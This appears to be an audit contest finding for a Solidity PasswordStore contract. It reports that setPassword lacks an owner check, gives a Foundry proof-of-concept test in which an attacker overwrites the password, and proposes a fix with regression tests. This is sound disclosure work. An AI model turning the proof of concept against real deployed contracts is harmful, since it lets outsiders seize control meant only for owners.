Submission Details
Severity: high
Valid

Attacker can change the password

Summary

An attacker can change the password

Vulnerability Details

Because setPassword does not check who the caller is, anyone can change the stored password, even though only the owner should be able to.

Proof Of Concept

In the test file PasswordStore.t.sol, add this line before the setUp() function:

address attacker = makeAddr("Attacker");

Lastly, add the following test at the end of the test file and run it via forge t --mt test_AttackerCanChangePassword -vv

function test_AttackerCanChangePassword() public {
    // owner checks the password before the attack
    vm.prank(owner);
    string memory passwordBeforeAttack = passwordStore.getPassword();
    console.log("Password Before Attack:", passwordBeforeAttack); // OUTPUT: myPassword
    assertEq(passwordBeforeAttack, "myPassword"); // passes

    // attacker (not the owner) changes the password
    vm.prank(attacker);
    string memory attackerPassword = "attackerPassword";
    passwordStore.setPassword(attackerPassword);

    // owner checks the password after the attack: it is now the attacker's value
    vm.prank(owner);
    string memory passwordAfterAttack = passwordStore.getPassword();
    assertEq(passwordAfterAttack, attackerPassword); // passes
    console.log("Password After Attack:", passwordAfterAttack); // OUTPUT: attackerPassword
}

Impact

An attacker can change the password, even though only the owner should be able to do so. This can lock the owner out of their account, among a plethora of other issues.

Tools Used

Foundry

Recommendations

Make sure the caller is the owner of the contract; if not, revert.

Example:

function setPassword(string memory newPassword) external {
    if (msg.sender != s_owner) {
        revert PasswordStore__NotOwner();
    }
    s_password = newPassword;
    emit SetNetPassword();
}
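An added regression test for the recommended fix (example code, not part of the original submission). It assumes the patched contract lives at src/PasswordStore.sol, declares the custom error PasswordStore__NotOwner used above, and sets s_owner to msg.sender in its constructor, so deploying it directly from the test makes the test contract the owner.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Test} from "forge-std/Test.sol";
import {PasswordStore} from "../src/PasswordStore.sol"; // assumed path

contract PasswordStoreAccessControlTest is Test {
    PasswordStore public passwordStore;
    address public owner;
    address attacker = makeAddr("Attacker"); // same label as the PoC above

    function setUp() public {
        // Assumption: the constructor stores msg.sender as s_owner, so the
        // deploying test contract becomes the owner.
        owner = address(this);
        passwordStore = new PasswordStore();
        passwordStore.setPassword("myPassword");
    }

    // With the fix in place, a non-owner call must revert with the custom error
    // and leave the stored password untouched.
    function test_NonOwnerCannotSetPassword() public {
        vm.prank(attacker);
        vm.expectRevert(PasswordStore.PasswordStore__NotOwner.selector);
        passwordStore.setPassword("attackerPassword");

        vm.prank(owner);
        assertEq(passwordStore.getPassword(), "myPassword");
    }

    // The owner must keep the ability to rotate the password.
    function test_OwnerCanStillSetPassword() public {
        vm.prank(owner);
        passwordStore.setPassword("newPassword");

        vm.prank(owner);
        assertEq(passwordStore.getPassword(), "newPassword");
    }
}
```

Run it with forge test --mc PasswordStoreAccessControlTest -vv; both tests fail against the unpatched contract and pass once the owner check is added.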

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-lacking-access-control

Anyone can call `setPassword` and set a new password contrary to the intended purpose.
